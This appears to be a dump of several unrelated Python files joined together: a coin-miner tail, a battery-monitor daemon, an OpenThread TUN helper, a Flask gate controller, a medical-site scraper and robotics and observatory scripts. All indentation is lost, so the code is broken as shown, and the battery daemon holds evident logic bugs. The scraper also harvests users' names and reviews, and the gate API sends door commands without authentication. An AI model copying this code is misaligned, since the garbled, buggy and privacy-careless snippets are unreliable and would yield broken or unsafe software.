settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
gavin_bms.py
|
#!/usr/local/bin/python3.6 -u
# Daemon to read values from the voltage and current sensors
# Data is requested through a json string, and returned as a json string
import os.path
from os import unlink
#from datetime import date
import json
import socket
from threading import Thread
from time import sleep
id = 'Gavin BMS Daemon'
version = '1.1.3'
DEBUG = 0
try:
import Adafruit_ADS1x15
DEV_MODE = 0
except ImportError:
print("ADS11x5 ADC not found, entering offline dev mode.")
DEV_MODE = 1
if DEV_MODE != 1:
# Configure ADS11x5 parameters
adc = Adafruit_ADS1x15.ADS1115(address=0x48, busnum=1)
adc_GAIN = 2/3
adc_SPS = 128
adc_VOFFSET = [5.545, 5]
adc_ACS770_OFFSET = 40
voltage_value = []
sensor_data_map = {}
# setup config map
config_map = {}
battery_map = {}
# Config file location
config_map['config_dir'] = "/opt/gavin/etc"
config_map['config_file'] = "config.json"
battery_map['config_file'] = "battery_config.json"
battery_map['initial_ert'] = 65535
battery_map['epoch_counter'] = 0
# Default config values
config_map['motor_watts'] = 500 # Gavin motor per Tahoe Benchmark
config_map['adc_offset'] = .1875
config_map['acs7xx_scaling'] = 0
config_map['acs7xx_error'] = -120
# Default battery values
# battery config file created or added to when batteries are configured (new batteries)
# battery logs reference battery config file via UUID
battery_map['uuid'] = "2135"
battery_map['mfg'] = ""
battery_map['model'] = ""
battery_map['weight'] = 0
battery_map['modules'] = 2
battery_map['chemistry'] = "SLA"
battery_map['voltage'] = 12
battery_map['amphr'] = 35
battery_map['min_voltage'] = 10
battery_map['max_voltage'] = 13.1
sensor_data_map['ert'] = 0
# Server values
serversocket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
socket_file = "/tmp/gavin_bms.socket"
try:
os.unlink(socket_file)
except OSError:
if os.path.exists(socket_file):
raise
# Function to read or reread config file
def read_config():
if os.path.isfile('%s/%s' % (config_map['config_dir'], config_map['config_file'])):
with open('%s/%s' % (config_map['config_dir'], config_map['config_file']), 'r') as configfile:
try:
config = json.load(configfile)
if 'motor' in config:
if 'watts' in config['motor']:
config_map['motor_watts'] = int(config['motor']['watts'])
if 'adc' in config:
if 'offset' in config['adc']:
config_map['adc_offset'] = float(config['adc']['offset'])
if 'ACS7xx' in config:
if 'scaling' in config['ACS7xx']:
config_map['acs7xx_scaling'] = int(config['ACS7xx']['scaling'])
if 'error' in config['ACS7xx']:
config_map['acs7xx_error'] = int(config['ACS7xx']['error'])
except ValueError:
print("Corrupt config file, loading defaults.")
else:
print("Config file not found, loading defaults.")
# Function to read/reread battery setup data
def read_battery_config():
if os.path.isfile('%s/%s' % (config_map['config_dir'], battery_map['config_file'])):
with open('%s/%s' % (config_map['config_dir'], battery_map['config_file']), 'r') as battery_config:
try:
battery_specs = json.load(battery_config)
battery_specs = max(battery_specs.items(), key=lambda i: i[1]['installed'])
battery_map['uuid'] = battery_specs[1]['uuid']
if "battery-" + battery_map['uuid'] in battery_specs:
if 'installed' in battery_specs[1]:
battery_map['installed'] = battery_specs[1]['installed']
if 'mfg' in battery_specs[1]:
battery_map['mfg'] = battery_specs[1]['mfg']
if 'model' in battery_specs[1]:
battery_map['model'] = battery_specs[1]['model']
if 'weight' in battery_specs[1]:
battery_map['weight'] = battery_specs[1]['weight']
if 'modules' in battery_specs[1]:
battery_map['modules'] = int(battery_specs[1]['modules'])
if 'chemistry' in battery_specs[1]:
battery_map['chemistry'] = battery_specs[1]['chemistry']
if 'voltage' in battery_specs[1]:
battery_map['voltage'] = float(battery_specs[1]['voltage'])
if 'ampHr' in battery_specs[1]:
battery_map['amphr'] = int(battery_specs[1]['ampHr'])
if 'min_voltage' in battery_specs[1]:
battery_map['min_voltage'] = float(battery_specs[1]['min_voltage'])
if 'max_voltage' in battery_specs[1]:
battery_map['max_voltage'] = float(battery_specs[1]['max_voltage'])
except ValueError:
print("Corrupt battery config file, loading defaults.")
else:
print("Battery config file not found, loading defaults.")
def read_sensors():
if DEV_MODE != 1:
if config_map['acs7xx_scaling'] == 1:
adc_current_reference_voltage = float("{0:.4f}".format((sensor_data_map['adc_current_reference'] * config_map['adc_offset'] * .001)))
adc_offset_percent = adc_current_reference_voltage / 5.0
adc_ACS770_OFFSET_adjusted = adc_ACS770_OFFSET / 1000 * adc_offset_percent
else:
adc_ACS770_OFFSET_adjusted = adc_ACS770_OFFSET
sensor_data_map['current_actual_raw'] = float("{0:.4f}".format(((sensor_data_map['adc_current_value'] - (sensor_data_map['adc_current_reference'] / 2) - config_map['acs7xx_error']) * config_map['adc_offset']) / adc_ACS770_OFFSET_adjusted))
if -.005 <= sensor_data_map['current_actual_raw'] <= .05:
sensor_data_map['current_actual'] = 0
else:
sensor_data_map['current_actual'] = sensor_data_map['current_actual_raw']
for battery_module in range(0, battery_map['modules']):
voltage_value[battery_module] = float("{0:.2f}".format(((adc.read_adc(battery_module + 1, gain=adc_GAIN, data_rate=adc_SPS) * config_map['adc_offset']) * adc_VOFFSET[battery_module]) * .001))
for battery_module in range(0, battery_map['modules']):
if battery_module < battery_map['modules'] - 1:
voltage_value[battery_module] = float("{0:.2f}".format(voltage_value[battery_module] - voltage_value[battery_module + 1]))
if sensor_data_map['current_actual_raw'] > .5:
sensor_data_map['state'] = 'on trigger'
elif .05 <= sensor_data_map['current_actual_raw'] >= .5:
sensor_data_map['state'] = 'discharging'
elif -.350 <= sensor_data_map['current_actual_raw'] < -.005 and all(13.5 <= v <= 14.3 for v in voltage_value):
sensor_data_map['state'] = 'maintaining'
elif sensor_data_map['current_actual_raw'] < -.350:
sensor_data_map['state'] = 'charging'
else:
sensor_data_map['state'] = 'resting'
else:
voltage_value[0] = 12.33
voltage_value[1] = 12.29
sensor_data_map['adc_current_value'] = 13989
sensor_data_map['adc_current_reference'] = 27189
sensor_data_map['current_actual'] = 16
sensor_data_map['state'] = 'discharging'
sensor_data_map['vbatt_actual'] = float("{0:.2f}".format(sum(voltage_value)))
sensor_data_map['watts_actual'] = float("{0:.2f}".format(sensor_data_map['current_actual'] * sensor_data_map['vbatt_actual']))
if sensor_data_map['current_max'] < sensor_data_map['current_actual']:
sensor_data_map['current_max'] = sensor_data_map['current_actual']
if sensor_data_map['adc_current_min'] > sensor_data_map['adc_current_value']:
sensor_data_map['adc_current_min'] = sensor_data_map['adc_current_value']
if sensor_data_map['adc_current_max'] < sensor_data_map['adc_current_value']:
sensor_data_map['adc_current_max'] = sensor_data_map['adc_current_value']
def runtime_calculator():
# Simple runtime estimate based on ideal battery, and SoC, needs to be cleaned up later
# ERT in minutes
# SoC based on open circuit voltage. min_voltage also valid for load
# Need to add coulomb cou ter value for better percentage estimate
if battery_map['chemistry'] == 'SLA':
if sensor_data_map['vbatt_actual'] <= (battery_map['min_voltage'] * battery_map['modules']):
sensor_data_map['battery_percent'] = 0
elif sensor_data_map['vbatt_actual'] >= (battery_map['max_voltage'] * battery_map['modules']):
sensor_data_map['battery_percent'] = 100
else:
sensor_data_map['battery_percent'] = float("{0:.0f}".format((sensor_data_map['vbatt_actual'] - (battery_map['min_voltage'] * battery_map['modules'])) * 100 / ((battery_map['max_voltage'] * battery_map['modules']) - (battery_map['min_voltage'] * battery_map['modules']))))
# Initial ERT when current is detected
if battery_map['initial_ert'] == 65535 and (sensor_data_map['watts_actual'] / 2) > 0:
battery_map['initial_ert'] = int((battery_map['amphr'] * 10) / (sensor_data_map['watts_actual'] / 2) * 60)
#if battery_map['chemistry'] == 'SLA':
#battery_map['initial_ert'] = int(battery_map['initial_ert'] * .6)
sensor_data_map['ert'] = battery_map['initial_ert']
if DEBUG == 1:
print('ERT calc, no initial ert and current above 0: %d' % (sensor_data_map['ert']))
# Initial ERT calc based on battery amphr rating and max motor wattage. Assumes open circuit voltage
elif battery_map['initial_ert'] == 65535 and sensor_data_map['watts_actual'] == 0:
sensor_data_map['ert'] = int((battery_map['amphr'] * 10) / (config_map['motor_watts'] / 2) * 60 * (sensor_data_map['battery_percent'] / 100))
#if battery_map['chemistry'] == 'SLA':
#ert = ert * .6
if DEBUG == 1:
print('ERT Calc, no initial ert and no current: %d' % (sensor_data_map['ert']))
# Update running ERT
elif battery_map['initial_ert'] != 65535 and (sensor_data_map['watts_actual'] / 2) > 0:
sensor_data_map['ert'] = int(((battery_map['amphr'] - sensor_data_map['current_total']) * 10) / (sensor_data_map['watts_actual'] / 2) * 60)
if DEBUG == 1:
print('ERT calc, initial ert set and current above 0: %d' % (sensor_data_map['ert']))
def coulomb_counter():
startup = 1
avg_counter = 0
avg_current = 0
avg_ref = 0
avg_loop = 10
sensor_data_map['current_total'] = 0
sensor_data_map['current_max'] = 0
sensor_data_map['adc_current_min'] = 13833
sensor_data_map['adc_current_max'] = 13111
while True:
avg_current += adc.read_adc(3, gain=adc_GAIN, data_rate=adc_SPS)
avg_ref += adc.read_adc(0, gain=adc_GAIN, data_rate=adc_SPS)
if avg_counter == avg_loop and startup == 0:
sensor_data_map['adc_current_value'] = int(round(avg_current / avg_loop))
sensor_data_map['adc_current_reference'] = int(round(avg_ref / avg_loop))
read_sensors()
if DEBUG == 1:
print('adc value: %d supply value: %d' % (sensor_data_map['adc_current_value'], sensor_data_map['adc_current_reference']))
if sensor_data_map['state'] == 'charging' or sensor_data_map['state'] == 'discharging':
sensor_data_map['current_total'] += (sensor_data_map['current_actual'] / 3600)
sensor_data_map['watts_total'] = sensor_data_map['current_total'] * sensor_data_map['vbatt_actual']
if DEBUG == 1:
print('Current: %f, current total: %f' % (sensor_data_map['current_actual_raw'], sensor_data_map['current_total']))
runtime_calculator()
avg_counter = 0
avg_current = 0
avg_ref = 0
elif avg_counter == avg_loop and startup == 1:
avg_counter = 0
avg_current = 0
avg_ref = 0
startup = 0
avg_counter += 1
sleep(1/avg_loop)
# Get values from config file
read_config()
read_battery_config()
for i in range(0, battery_map['modules']):
voltage_value.append(0)
# Setup socket and 2 listeners
serversocket.bind(socket_file)
serversocket.listen(2)
coulomb_counter_thread = Thread(target = coulomb_counter)
coulomb_counter_thread.start()
print(id, version, "listening on", socket_file)
# Main loop
while True:
msg = ''
clientsocket, addr = serversocket.accept()
if DEV_MODE == 1:
print("Got a connection")
incomming = clientsocket.recv(32).decode()
try:
request = json.loads(incomming)
except:
msg = 'Commands must be in correct JSON format\n'
request = ''
if 'request' in request:
if request['request'] == 'data':
if DEBUG == 1:
print('adc current min: %d adc current max: %d' % (sensor_data_map['adc_current_min'], sensor_data_map['adc_current_max']))
battery_data = '{"voltage": %s, "current": %s, "current total": %s, "current max": %s, "watts": %s, "ert": %s, "percent": %s, "state": "%s",' % (str(sensor_data_map['vbatt_actual']), str(sensor_data_map['current_actual']), str(sensor_data_map['current_total']), str(sensor_data_map['current_max']), str(sensor_data_map['watts_actual']), str(sensor_data_map['ert']), str(sensor_data_map['battery_percent']), sensor_data_map['state'])
for i in range(0, battery_map['modules']):
battery_data = '%s "v%s": %s, ' % (battery_data, str(i + 1), str(voltage_value[i]))
battery_data = '%s "uuid": "%s"}' % (battery_data, battery_map['uuid'])
msg = json.dumps(json.loads(battery_data), indent = 4, sort_keys = True, separators=(',', ': '))
elif request['request'] == 'reload':
read_config()
read_battery_config()
for i in range(0, battery_map['modules']):
voltage_value.append(0)
msg = json.dumps({'reload': 'complete'}, indent = 4, sort_keys = True, separators=(',', ': '))
elif request['request'] == 'shutdown':
msg = json.dumps({'shutdown': 'complete'}, indent = 4, sort_keys = True, separators=(',', ': '))
break
elif request['request'] == 'version':
msg = json.dumps({'Name': id, 'Version': version}, indent = 4, sort_keys = True, separators=(',', ': '))
elif request['request'] == 'battery info':
msg = json.dumps({'uuid': battery_map['uuid'], 'installed': battery_map['installed'], 'mfg': battery_map['mfg'], 'model': battery_map['model'], 'amphr': battery_map['amphr'], 'chemistry': battery_map['chemistry'], 'voltage': battery_map['voltage'], 'minimum voltage': battery_map['min_voltage'], 'maximum voltage': battery_map['max_voltage'], 'weight': battery_map['weight'], 'modules': battery_map['modules']}, indent = 4, sort_keys = True, separators=(',', ': '))
else:
msg = json.dumps({'request': 'unknown'}, indent = 4, sort_keys = True, separators=(',', ': '))
else:
if request != '':
msg = json.dumps({'request': 'unknown'}, indent = 4, sort_keys = True, separators=(',', ': '))
try:
clientsocket.send(msg.encode('ascii'))
except:
socket.error
clientsocket.close()
clientsocket.send(msg.encode('ascii'))
clientsocket.close()
print(id, "exiting")
|
tun.py
|
#
# Copyright (c) 2016-2017, The OpenThread Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Utility class for creating TUN network interfaces on Linux and OSX. """
from __future__ import print_function
import os
import sys
import struct
import logging
import threading
import traceback
import subprocess
if sys.platform == "linux" or sys.platform == "linux2":
import fcntl
from select import select
import spinel.util as util
import spinel.config as CONFIG
IFF_TUN = 0x0001
IFF_TAP = 0x0002
IFF_NO_PI = 0x1000
IFF_TUNSETIFF = 0x400454ca
IFF_TUNSETOWNER = IFF_TUNSETIFF + 2
class TunInterface(object):
""" Utility class for creating a TUN network interface. """
def __init__(self, identifier):
self.identifier = identifier
self.ifname = "tun" + str(self.identifier)
self.tun = None
self.fd = None
platform = sys.platform
if platform == "linux" or platform == "linux2":
self.__init_linux()
elif platform == "darwin":
self.__init_osx()
else:
raise RuntimeError("Platform \"{}\" is not supported.".format(platform))
self.ifconfig("up")
#self.ifconfig("inet6 add fd00::1/64")
self.__start_tun_thread()
def __init_osx(self):
logging.info("TUN: Starting osx " + self.ifname)
filename = "/dev/" + self.ifname
self.tun = os.open(filename, os.O_RDWR)
self.fd = self.tun
# trick osx to auto-assign a link local address
self.addr_add("fe80::1")
self.addr_del("fe80::1")
def __init_linux(self):
logging.info("TUN: Starting linux " + self.ifname)
self.tun = open("/dev/net/tun", "r+b")
self.fd = self.tun.fileno()
ifr = struct.pack("16sH", self.ifname, IFF_TUN | IFF_NO_PI)
fcntl.ioctl(self.tun, IFF_TUNSETIFF, ifr) # Name interface tun#
fcntl.ioctl(self.tun, IFF_TUNSETOWNER, 1000) # Allow non-sudo access
def close(self):
""" Close this tunnel interface. """
if self.tun:
os.close(self.fd)
self.fd = None
self.tun = None
@classmethod
def command(cls, cmd):
""" Utility to make a system call. """
subprocess.check_call(cmd, shell=True)
def ifconfig(self, args):
""" Bring interface up and/or assign addresses. """
self.command('ifconfig ' + self.ifname + ' ' + args)
def ping6(self, args):
""" Ping an address. """
cmd = 'ping6 ' + args
print(cmd)
self.command(cmd)
def addr_add(self, addr):
""" Add the given IPv6 address to the tunnel interface. """
self.ifconfig('inet6 add ' + addr)
def addr_del(self, addr):
""" Delete the given IPv6 address from the tunnel interface. """
platform = sys.platform
if platform == "linux" or platform == "linux2":
self.ifconfig('inet6 del ' + addr)
elif platform == "darwin":
self.ifconfig('inet6 delete ' + addr)
def write(self, packet):
#global gWpanApi
#gWpanApi.ip_send(packet)
# os.write(self.fd, packet) # Loop back
if CONFIG.DEBUG_TUN:
logging.debug("\nTUN: TX (" + str(len(packet)) +
") " + util.hexify_str(packet))
def __run_tun_thread(self):
while self.fd:
try:
ready_fd = select([self.fd], [], [])[0][0]
if ready_fd == self.fd:
packet = os.read(self.fd, 4000)
if CONFIG.DEBUG_TUN:
logging.debug("\nTUN: RX (" + str(len(packet)) + ") " +
util.hexify_str(packet))
self.write(packet)
except:
traceback.print_exc()
break
logging.info("TUN: exiting")
if self.fd:
os.close(self.fd)
self.fd = None
def __start_tun_thread(self):
"""Start reader thread"""
self._reader_alive = True
self.receiver_thread = threading.Thread(target=self.__run_tun_thread)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
|
controller.py
|
'''
Description: 门禁控制模块
Author: Shengxiang Hu
Github: https://github.com/MTleen
Date: 2021-02-07 23:12:03
LastEditors: Shengxiang Hu
LastEditTime: 2021-03-18 19:48:39
FilePath: /smart_gate_v2/controller.py
'''
from flask import Flask
from flask import request
import os
from numpy.lib.histograms import histogram
import requests
import yaml
import json
import argparse
from threading import Timer, Thread
import logging
from easydict import EasyDict as edict
import time
from redis import StrictRedis
from man_utils.parser import get_config
from man_utils.log import get_logger
from detect import check_accesstoken, heartbeat, parse_args, start_detect
app = Flask(__name__)
os.chdir(os.path.dirname(os.path.abspath(__file__)))
logger = get_logger('gunicorn')
try:
redis = StrictRedis('127.0.0.1', port=6379, db=1)
except Exception:
logger.error('redis 数据库连接错误!')
@app.route('/set_mode')
def set_mode():
mode = request.args.get('mode')
# cfg.sys.mode = int(mode)
redis.set('mode', mode)
logger.info(f'***************** set mode:{mode} *****************')
return 'ok'
@app.route('/get_detect_states')
def get_states():
return redis.get('detect_status').decode()
@app.route('/get_whitelist')
def get_white_list():
logger.info('***************** get whilelist *****************')
return json.dumps(list(
map(lambda x: x.decode(), redis.lrange('white_list', 0, -1))),
ensure_ascii=False)
@app.route('/get_mode')
def get_mode():
logger.info('***************** get_mode *****************')
return {'1': '自动模式', '0': '手动模式'}[redis.get('mode').decode()]
@app.route('/send_command')
def send_command():
command = request.args.get('operation')
logger.info(f'***************** send command: {command} *****************')
url = redis.get('manual_command_url').decode()
print(command)
res = requests.get(url, params={'operation': command})
if res.status_code == 200:
return 'ok'
else:
return 'error'
@app.route('/get_history')
def get_history():
logger.info('***************** get history *****************')
date = time.strftime('%Y-%m-%d', time.localtime())
if redis:
try:
raw_history = redis.lrange(date, 0, -1)
history = list(map(lambda x: x.decode(), raw_history))
return json.dumps(history, ensure_ascii=False)
except Exception:
logger.error('redis 操作出错!')
return 'error'
else:
return 'error'
def start_server():
try:
while 1:
app.run(host='0.0.0.0',
ssl_context=('./server/server.pem', './server/server.key'))
except Exception:
logger.error('服务器报错,重启服务器!')
start_server()
if __name__ == '__main__':
# os.chdir(os.path.dirname(os.path.abspath(__file__)))
# # 启动服务器
# Thread(target=start_server, name='flask_server').start()
# args = parse_args()
# cfg = get_config()
# cfg.merge_from_file(args.config_deepsort)
# cfg.merge_from_file(args.config_classes)
# cfg.merge_from_file(args.config_sys)
# cfg.merge_from_file(args.config_license)
# logger = get_logger()
# check_accesstoken(cfg, args)
# hbt = Thread(target=heartbeat)
# hbt.setDaemon(True)
# hbt.start()
# try:
# redis = StrictRedis('127.0.0.1', port=6379, db=1)
# start_detect(cfg, args, redis)
# except Exception:
# logging.error('redis 数据库连接错误!')
...
|
DUrlConsumer.py
|
#! /usr/bin/python
import traceback
from datetime import datetime
import gevent
from gevent import monkey
from common.DBHandler import MySQL
from common.DBHandler import Redis
from common.IOHandler import FileIO
from common.IOHandler import NetworkIO
monkey.patch_all()
def getAllInfo(dbkey):
urlPool = Redis().listUrls(dbkey, 1)
# urlPool = ['http://club.xywy.com/familyDoctor/pay/86054846', 'http://club.xywy.com/familyDoctor/pay/43983196',
# 'http://club.xywy.com/familyDoctor/pay/28476935']
while 1:
if len(urlPool) > 0:
for url in urlPool:
getInfo(url)
getInfo2(url + '?info=1&page=1#name2')
getInfo3(url + '?info=1&page=1#name2')
getInfo4(url + '?info=2&page=1#name3')
urlPool = Redis().listUrls(dbkey, 1)
else:
break
def getInfo(url):
# http://club.xywy.com/familyDoctor/pay/43983196 对应的页面信息
try:
html = NetworkIO().requestHtml(url)
if html is not None:
# 医生姓名
doctorName = html.findtext('.//i[@class="fwei fl"]')
doctorName = doctorName[:-6] if doctorName is not None and len(doctorName) > 6 else None
# 医生职称和医院科室
doctorRankAndHosp = html.find('.//div[@class=" lh200 pt10 f14"]')
doctorRank = doctorRankAndHosp.text
doctorHosp = doctorRankAndHosp.find('./br')
# 获取医生的勋章
medalsBlock = html.findall('.//div[@class="HomePth"]/span')
medals = ''
for medal in medalsBlock:
medals += medal.get('data-th') + ','
# 医生的寄语
sendWord = html.find('.//div[@class="f12 graydeep club_home_icon HomePj"]/span').tail
# 医生的服务类型
serviceTypeBlock = {0: html.find('.//div[@class="fl pr"]'), 1: None}
if serviceTypeBlock[0] is None:
serviceTypeBlock[1] = html.find('.//div[@class="fl f14"]')
serviceTypes = {0: '', 1: ''}
oldServiceTypes = {0: '', 1: ''}
if serviceTypeBlock[0] is not None:
serviceTypeBlock2 = serviceTypeBlock[0].findall('.//a[@cate]')
for index, item in enumerate(serviceTypeBlock2):
for text in item.itertext():
serviceTypes[index] += text.strip()
elif serviceTypeBlock[1] is not None:
# 各服务原始价格
serviceTypeBlock2 = serviceTypeBlock[1].findall('.//a[@cate]')
for index, item in enumerate(serviceTypeBlock2):
for text in item.itertext():
serviceTypes[index] += text.strip()
serviceTypeBlock2 = serviceTypeBlock[1].findall('.//span[@class="f14 col99 ml10"]')
for index, item in enumerate(serviceTypeBlock2):
for text in item.itertext():
oldServiceTypes[index] += text.strip()
# 用户评分(放到用户评价界面抓取)
# evaluateScore = html.findtext('.//span[@class="fl colClass01 fwei"]')
# 签约家庭和帮助用户
helpedInfo = {0: None, 1: None}
helpedInfoBlock = html.findall('.//span[@class="fb f16 ml5"]')
for index, item in enumerate(helpedInfoBlock):
helpedInfo[index] = item.text
# 擅长、简介以及荣誉
infos = {0: '', 1: '', 2: ''}
infoBlock = html.findall('.//div[@class="HomeJie f14 fwei pt20"]')
for item in infoBlock:
tmp = item.findtext('./h4')
textblock = item.find('./div')
tmptext = ''
for text in textblock.itertext():
tmptext += text.strip()
if '擅长' in tmp:
infos[0] = tmptext
elif '简介' in tmp:
infos[1] = tmptext
elif '荣誉' in tmp:
infos[2] = tmptext
dbInfo = (url, doctorName, doctorRank, doctorHosp.tail, medals, sendWord, serviceTypes[0], serviceTypes[1],
oldServiceTypes[0], oldServiceTypes[1], helpedInfo[0], helpedInfo[1], infos[0], infos[1],
infos[2])
MySQL().saveDoctorInfo(dbInfo)
except:
doExpt('url1', url, 'url1')
def getInfo2(url):
# http://club.xywy.com/familyDoctor/pay/43983196?info=1&page=2#name2 对应页面总的用户评价相关信息
try:
html = NetworkIO().requestHtml(url)
if html is not None:
evaluateScore = html.findtext('.//h4[@class="f30 colClass01 fWei tc"]').strip()
evaluateStat = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0}
evaluateStatBlock = html.findall('.//div[@class="HomSptop_Ri fWei f14 mt20 fl"]/span')
for index, item in enumerate(evaluateStatBlock):
tmptext = item.text
evaluateStat[index] = 0 if len(tmptext) == 0 else int(tmptext[tmptext.find('(') + 1:tmptext.find(')')])
dbInfo = (url, evaluateScore, evaluateStat[0], evaluateStat[1], evaluateStat[2], evaluateStat[3],
evaluateStat[4], evaluateStat[5], evaluateStat[6], evaluateStat[7])
MySQL().saveDoctorEvaluation(dbInfo)
except:
doExpt('url2', url, 'url2')
def getInfo3(url):
# http://club.xywy.com/familyDoctor/pay/43983196?info=1&page=2#name2 对应的用户评价具体内容
try:
# 当第一次访问页面时,除了获取评论信息,也要获取全部的评论页的总数
html = NetworkIO().requestHtml(url)
if html is not None:
evaluateBlock = html.findall('.//div[@class="User_eval lh180 btn-a f14 fwei mt10"]')
for index, block in enumerate(evaluateBlock):
uName = block.findtext('.//span[@class="mr10 fl"]').strip()
evalAtti = block.findtext('.//span[@class="fl colbd mr10"]').strip()
evalScore = block.findtext('.//span[@class="colClass01 fl"]').strip()
evalText = block.findtext('.//div[@class="pt5"]').strip()
evalTime = block.findtext('.//span[@class="colbd f12 db pt10"]').strip()
dbInfo = (url + '#' + str(index), uName, evalAtti, evalScore, evalText,
datetime.strptime(evalTime, '%Y-%m-%d %H:%M:%S'))
MySQL().saveDoctorEvaluationText(dbInfo)
# 评价共有多少页
totalPageInfo = html.find('.//div[@class="mt20 HomeFen f14"]/span[@class="mr5"]')
totalPageInfo = 1 if totalPageInfo is None else totalPageInfo.text.strip()[1:-3]
# 目前评价页的索引值
tmpIndex = url.find('page=') + 5
currentPageIndex = url[tmpIndex:-6]
# 获取当前页以后的评论页的评论信息
if int(currentPageIndex) < int(totalPageInfo):
for pageIndex in range(int(currentPageIndex) + 1, int(totalPageInfo) + 1):
url = url[:int(tmpIndex)] + str(pageIndex) + '#name2'
html = NetworkIO().requestHtml(url)
if html is not None:
evaluateBlock = html.findall('.//div[@class="User_eval lh180 btn-a f14 fwei mt10"]')
for index, block in enumerate(evaluateBlock):
uName = block.findtext('.//span[@class="mr10 fl"]').strip()
evalAtti = block.findtext('.//span[@class="fl colbd mr10"]').strip()
evalScore = block.findtext('.//span[@class="colClass01 fl"]').strip()
evalText = block.findtext('.//div[@class="pt5"]').strip()
evalTime = block.findtext('.//span[@class="colbd f12 db pt10"]').strip()
dbInfo = (url + '#' + str(index), uName, evalAtti, evalScore, evalText,
datetime.strptime(evalTime, '%Y-%m-%d %H:%M:%S'))
MySQL().saveDoctorEvaluationText(dbInfo)
except:
doExpt('url3', url, 'url3')
def getInfo4(url):
# http://club.xywy.com/familyDoctor/pay/43983196?info=2&page=2#name3 对应的服务购买信息
try:
html = NetworkIO().requestHtml(url)
if html is not None:
serviceBuyBlock = html.findall('.//div[@class="HomBone fwei f14"]')
for index, block in enumerate(serviceBuyBlock):
uName = block.findtext('.//span[@class="w100"]').strip()
serviceType = 1 if '包月' in block.findtext('.//span[@class="w200 tl"]').strip() else 0
serviceCount = block.findtext('.//span[@class="w60 tc"]').strip()
servicePrice = block.findtext('.//span[@class="colClass01 fb w80 tc"]').strip()
serviceStatus = block.findtext('.//span[@class="club_home_icon HomBsuc"]').strip()
serviceTime = block.findtext('.//span[@class="col99 ml20 tc"]').strip()
dbInfo = (url + '#' + str(index), uName, serviceType, serviceCount, servicePrice, serviceStatus,
serviceTime)
MySQL().saveServiceInfo(dbInfo)
# 评价共有多少页
totalPageInfo = html.find('.//div[@class="mt20 HomeFen f14"]/span[@class="mr5"]')
totalPageInfo = 1 if totalPageInfo is None else totalPageInfo.text.strip()[1:-3]
# 目前评价页的索引值
tmpIndex = url.find('page=') + 5
currentPageIndex = url[tmpIndex:-6]
# 获取当前页以后的评论页的评论信息
if int(currentPageIndex) < int(totalPageInfo):
for pageIndex in range(int(currentPageIndex) + 1, int(totalPageInfo) + 1):
url = url[:int(tmpIndex)] + str(pageIndex) + '#name3'
html = NetworkIO().requestHtml(url)
if html is not None:
serviceBuyBlock = html.findall('.//div[@class="HomBone fwei f14"]')
for index, block in enumerate(serviceBuyBlock):
uName = block.findtext('.//span[@class="w100"]').strip()
serviceType = 1 if '包月' in block.findtext('.//span[@class="w200 tl"]').strip() else 0
serviceCount = block.findtext('.//span[@class="w60 tc"]').strip()
servicePrice = block.findtext('.//span[@class="colClass01 fb w80 tc"]').strip()
serviceStatus = block.findtext('.//span[@class="club_home_icon HomBsuc"]').strip()
serviceTime = block.findtext('.//span[@class="col99 ml20 tc"]').strip()
dbInfo = (url + '#' + str(index), uName, serviceType, serviceCount, servicePrice,
serviceStatus, serviceTime)
MySQL().saveServiceInfo(dbInfo)
except:
doExpt('url4', url, 'url4')
def doExpt(key, url, logIdentifier):
Redis().saveUrl(key, url)
FileIO.handleExpt(traceback.format_exc(), url, logIdentifier)
if __name__ == '__main__':
dbkey = input('请输入医生url列表名称:')
# threadList = []
# for i in range(5):
# tmpThread = threading.Thread(target=getQPageInfo, args=(tmpYear, None if tmpPwd == '' else tmpPwd))
# threadList.append(tmpThread)
# for tmpThread in threadList:
# tmpThread.start()
# for tmpThread in threadList:
# tmpThread.join()
jobs = []
for i in range(5):
jobs.append(gevent.spawn(getAllInfo, dbkey.strip()))
gevent.joinall(jobs)
|
ocs_end_of_night_thread.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# +
# import(s)
# -
from OcsCameraEntity import *
from OcsSequencerEntity import *
import threading
import os
# +
# function: worker_code()
# -
def worker_code(entity='', entobj=None):
# debug output
print('name: {0:s}'.format(threading.currentThread().getName()))
print('entity: {0:s}'.format(entity))
if hasattr(os, 'getppid'):
print('parent process id: {0:s}'.format(str(os.getppid())))
if hasattr(os, 'getpid'):
print('process id: {0:s}'.format(str(os.getpid())))
# do end_of_night stuff
if entobj:
# disable
entobj.logger.info('{0:s}.disable()'.format(entity))
entobj.disable()
# standby
entobj.logger.info('{0:s}.standby()'.format(entity))
entobj.standby()
# exit control
entobj.logger.info('{0:s}.exitcontrol()'.format(entity))
entobj.exitcontrol()
# return
return
# +
# main()
# -
if __name__ == "__main__":
# created shared entities
camera = OcsCameraEntity('CCS', 'Camera', False)
sequencer = OcsSequencerEntity('OCS', 'ocs', False)
# create jobs for each entity:
jobs = []
for E in ( camera, sequencer ):
j = threading.Thread(target=worker_code, args=(E._entity, E))
jobs.append(j)
j.start()
for j in jobs:
j.join()
print('{0:s} exited'.format(j.name))
|
Hiwin_socket_ros_20190510101135.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import Hiwin_socket_TCPcmd as TCP
import Hiwin_socket_Taskcmd as Taskcmd
import talker as talk
import enum
